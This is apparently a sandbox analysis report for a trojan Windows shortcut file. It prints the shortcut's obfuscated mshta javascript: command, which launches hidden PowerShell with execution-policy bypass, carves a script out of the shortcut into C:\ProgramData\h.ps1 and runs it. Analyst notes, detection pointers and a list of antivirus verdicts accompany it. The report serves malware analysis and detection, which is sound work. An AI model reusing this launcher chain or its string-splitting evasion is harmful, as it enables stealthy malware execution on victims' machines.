Static | ZeroBOX
No static analysis available.
Windows
System32
mshta.exe
C:\Windows\System32\mshta.exe
0GmaY|
C&;Grw{
)'-Fo
desktop-6ko8d2u
$gl82=@();$egi0="moqSpQD7IyMyMjdmV2ci0TdyMHJswz"[26..3];$cfk1="yepzYnASblRXStUmdv1WZksacd"[20..2];$egi2="morYk1WYyd2byBHXcuyae"[16..3];$ins3="jq7cSMzBnLoxFXhRXyacde"[16..2];$gikl4=$egi0+$cfk1+$egi2+$ins3;$gl82+=$gikl4 -join '';$lv="ase64S";$aei5="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
Windows
@System32
mshta.exe
n..\..\..\Windows\System32\mshta.exe
// LNK command-line arguments as extracted by the sandbox: a `javascript:` URL handed to mshta.exe.
// Analyst notes (the statement below is kept byte-for-byte as evidence):
// - String literals are split with "+" ("powe"+..., "Activ"+"eXObject", " -Encod"+"ing") so the
//   keywords never appear contiguously in the shortcut; match on the reassembled process
//   command line rather than on the raw LNK strings.
// - eval(s) creates a WScript.Shell object and calls Run(c, 0, true): window style 0 (hidden),
//   wait for the child to exit, then close() the mshta window.
// - c reassembles to a `powershell -ep bypass -c ...` command which:
//     1. looks for a *.lnk whose length equals $t = 0x19c6 (6598 bytes) in the current directory,
//        falling back to $env:TEMP\*\*.lnk -- presumably the shortcut locating itself
//        (inferred from the size match; not confirmed on this page);
//     2. reads that file as bytes (gc ... -Encoding Byte), skips the first 0x0976 (2422) bytes and
//        writes the remainder to c:\programdata\h.ps1 (sc ... -Force -Encoding Byte);
//     3. writes the value 0 to c:\programdata\41026 (purpose not shown here);
//     4. starts a second `powershell -ep bypass -f` on the h.ps1 file written in step 2.
// - Detection pointers: mshta.exe launched with a `javascript:` argument, mshta.exe as parent of
//   powershell.exe with `-ep bypass`, and creation of h.ps1 / 41026 directly under C:\ProgramData.
javascript:g="c:\\prog"+"ramdata\\";m=" -Encod"+"ing Byte;sc ";a="rshell -ep bypa"+"ss ";p="$w ([byte[]]($f | select -Skip 0x0976)) -Force";s="a=new Activ"+"eXObject('WScr"+"ipt.Shell');a.Run(c,0,true);close();";c="powe"+a+"-c $t=0x19c6;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -Expan"+"dProperty Name;if($k.c"+"ount -eq 0){$k=Get-ChildItem $env:TEMP\\*\\*.lnk | where-object{$_.length -eq $t};};$w='"+g+"h.ps1';$f=gc $k"+m+p+m+g+"41026 0;"+"powe"+a+"-f $w;";eval(s);
System32 (C:\Windows)
S-1-5-21-1840914918-3743596314-2189714932-1002
mshta.exe
Application
C:\Windows\System32\mshta.exe
Antivirus Signature
Bkav Clean
Lionic Trojan.WinLNK.Boxter.4!c
ClamAV Clean
CTX lnk.trojan.generic
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.Agent.LNK.Gen
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
huorong Trojan/LNK.Starter.bj
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 LNK/Agent.AHC
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan.Multi.Runner.c
BitDefender Heur.BZC.UGZ.Boxter.1.694738B5
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.UGZ.Boxter.1.694738B5
Tencent Win32.Trojan.Runner.Dtgl
Sophos Troj/LnkObf-AV
F-Secure Trojan:W32/LnkGen.C
DrWeb Clean
VIPRE Heur.BZC.UGZ.Boxter.1.694738B5
TrendMicro Clean
CMC Clean
Emsisoft Heur.BZC.UGZ.Boxter.1.694738B5 (B)
Ikarus Win32.Outbreak
GData Heur.BZC.UGZ.Boxter.1.694738B5
Jiangmin Clean
Varist LNK/ABTrojan.QTFZ-
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.UGZ.Boxter.1.694738B5
SUPERAntiSpyware Clean
ZoneAlarm Troj/LnkObf-AV
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Probably Heur.LNKScript
Rising Trojan.Agent/LNK!8.197F2 (TOPIS:E0:AapaztxiTlP)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet LNK/Agent.AHC!tr
AVG Clean
Panda Clean
alibabacloud Trojan:Win/Wacatac.C9nj
No IRMA results available.